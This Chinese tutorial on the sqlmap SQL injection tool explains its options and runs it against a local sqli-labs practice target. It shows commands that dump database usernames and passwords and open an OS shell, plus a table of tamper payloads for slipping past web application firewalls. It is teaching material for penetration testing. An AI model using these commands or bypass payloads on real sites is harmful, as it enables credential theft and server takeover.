SQL注入工具Sqlmap

一、什么是Sqlmap

Sqlmap是一款开源的渗透测试工具,主要用于自动化检测和利用SQL注入漏洞,并能实现数据库服务器的接管。Sqlmap提供了多种功能和选项,包括数据库指纹识别、数据读取、文件系统访问以及通过带外数据连接执行系统命令等。它支持广泛的数据库类型,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等多种常见数据库管理系统。同时,Sqlmap还支持多种类型的SQL注入技术,例如基于布尔的盲注、基于时间的盲注、基于报错的注入、联合查询注入和堆叠查询注入等。使用方法:python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。

官网下载地址:https://github.com/sqlmapproject/sqlmap

官方使用指南:https://github.com/sqlmapproject/sqlmap/wiki/Usage

二、Sqlmap参数介绍

-u

使用方法:python sqlmap.py -u [URL]

描述:该参数用于指定需要测试的URL,通常是GET类型注入的必备参数。

--batch

使用方法:python sqlmap.py -u [URL] --batch

描述:使用该参数可以在所有需要用户输入的部分(通常是询问执行yes还是no)时,自动选择默认操作,不需要用户再次输入。

--flush-session

使用方法:python sqlmap.py -u [URL] --flush-session

描述:该参数表示清除当前目标的会话文件。Sqlmap在测试某一目标URL后会生成包含本次测试结果信息的session文件,当想重新测试该目标URL时,可使用此参数。

--dbms

使用方法:python sqlmap.py -u [URL] --dbms [数据库名]

描述:该参数用于指定数据库类型。Sqlmap默认情况下会自动检测Web应用程序的后端数据库管理系统,但当你明确知道要测试的数据库类型时,可以使用此参数指定。

--level

使用方法:python sqlmap.py -u [URL] --level [等级]

描述:该参数用于指定payload测试复杂等级,共有五个级别(1-5),默认值为1。等级越高,测试的payload越复杂。当低等级注入不成功时,可以逐步提高等级尝试。

--random-agent

使用方法:python sqlmap.py -u [URL] --random-agent

描述:使用该参数,Sqlmap将随机选择请求头中的User-Agent进行请求,而不是使用默认的User-Agent。

--user-agent

使用方法:python sqlmap.py -u [URL] --user-agent="自定义User-Agent"

描述:该参数允许用户指定自定义的User-Agent字符串。

--tamper

使用方法:python sqlmap.py -u [URL] --tamper [脚本路径1],[脚本路径2]...

描述:该参数用于指定篡改脚本的路径,可以帮助绕过Web应用防火墙(WAF)和其他防御机制。常用的tamper脚本包括space2comment.py和between.py

--technique

使用方法:python sqlmap.py -u [URL] --technique [注入类型选项]

描述:该参数用于指定要测试的SQL注入类型。Sqlmap默认会测试所有类型的注入,但可以使用此参数指定具体的注入类型,例如"BE"表示只测试布尔盲注和基于错误的注入。

三、Sqlmap基本使用

以sqllabs第9关为例

get请求基础用法

#获取所有数据库名称

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dbs

#获取当前数据库

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --current-db

#获取数据库security所有表名称

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --tables -D security

#获取数据库security的users表的所有列名

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --columns -D security -T users

#获取数据库security的users表的username和password列的值

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dump -D security -T users -C username,password

#写马

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --os-shell

post请求 --data

#获取所有数据库名称

python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" --dbs

获取数据库security所有表名称

python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security --tables

#获取数据库security的users表的所有列名

python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security -T users --columns

#获取数据库security的users表的username和password列的值

python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security -T users -C username,password --dump

指定文件(批量检测)-m

sqlmap -m urls.txt

指定要检测的文件(批量检测)-r

sqlmap -r http.txt #http.txt是我们抓取的http的请求包

sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测

需要登录的网站 --cookie

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞

进阶用法

检测是否有WAF --identify-waf

python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --identify-waf

指定脚本进行绕过 --tamper

详细看sqlmap_tamp注入的脚本.xlsx

sqlmap_tamp.xlsx文件内容:

|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 实现方式 |
| ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' |
| ("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw==' |
| ('1 UNION SELECT foobar')'1 UNION SELECT foobar' |
| ('SELECT id FROM users')'SELECT+id+FROM+users' |
| ('1 UNION SELECT 2--')'1 UNIOUNIONN SELESELECTCT 2--' |
| ('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers' |
| ('-1 UNION ALL SELECT')'-1 UNION SELECT' |
| ('1 AND 1=1')"1 AND 1=1 and '0having'='0having'" |
| '1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' |
| * Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1 |
| Input: SELECT id FROM usersOutput: SELECT%08id%02FROM%0Fusers |
| ('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227' |
| ('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--' |
| * Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
| ('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp_password' |
| * Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
| * Input: INSERT* Output: InsERt |
| * Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
| * Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users |
| * Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1 |
| ('1 AND A > B')'1 AND GREATEST(A,B+1)=A' |
| tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271' |
| ('IFNULL(1, 2)')'IF(ISNULL(1),2,1)' |
| ('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227' |
| ('1 AND 2>1--')'1 /*!30874AND 2>1*/--' |
| Input: SELECT id FROM usersOutput: SELECT%0Bid%0BFROM%A0users |
| ('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--' |
| ('1 AND 2>1--')'1 /*!00000AND 2>1*/--' |
| ('1 AND 9227=9227')'1--%0AAND--%0A9227=9227' |
| ('SELECT id FROM users where id = 1')'SELECT%09id FROM users where id LIKE 1' |
| * Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
| * Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
| * Input: INSERT* Output: InsERt |
| * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# |
| * Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users |
| * Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
| * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# |
| * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa |
| 1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" |
| * Input: 1 AND 9227=9227* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |
| ('1 AND A > B')'1 AND GREATEST(A,B+1)=A' |
| tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271' |
| ('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--' |
| * Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
| * Input: INSERT* Output: InsERt |
| * Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
| * Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users |
| ('1 AND A > B')'1 AND GREATEST(A,B+1)=A' |
| tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271' |
| ('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--' |
| * Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
| * Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
| * Input: INSERT* Output: InsERt |
| * Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
| * Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users |
| ('1 AND 1=1')'1 AND 1=1%00' |
| * Input: SELECT FIELD FROM%20TABLE* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 |
| * Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1--%20 |
| 'INSERT' becomes 'IN//S//ERT' |

相关推荐
TiDB_PingCAP33 分钟前
国产化新标杆:TiDB 助力广发银行新一代总账系统投产上线
运维·数据库·开源·tidb
qyhua37 分钟前
Linux内网端口转公网端口映射
linux·运维·服务器
开开心心kai38 分钟前
如何快速申请免费SSL证书,实现网站HTTPS安全传输
网络·网络协议·安全·https·ssl
想拿 0day 的脚步小子1 小时前
5.pwn Linux的延迟绑定机制
汇编·安全·渗透测试·pwn
Geeker551 小时前
如何在忘记密码的情况下解锁Android手机?
android·网络·macos·华为·智能手机·电脑·手机
乐安lan2 小时前
数据库的操作
数据库·oracle
知攻善防实验室2 小时前
[护网训练]原创应急响应靶机整理集合
web安全·网络安全·黑客·渗透测试
霖烟易辞2 小时前
MySQL中的DDL语句
数据库·mysql·ddl
j.king2 小时前
开源GTKSystem.Windows.Forms框架让C# winform支持跨平台运行
linux·c#·gtk
PY1782 小时前
Python的上下文管理器
数据库·python·oracle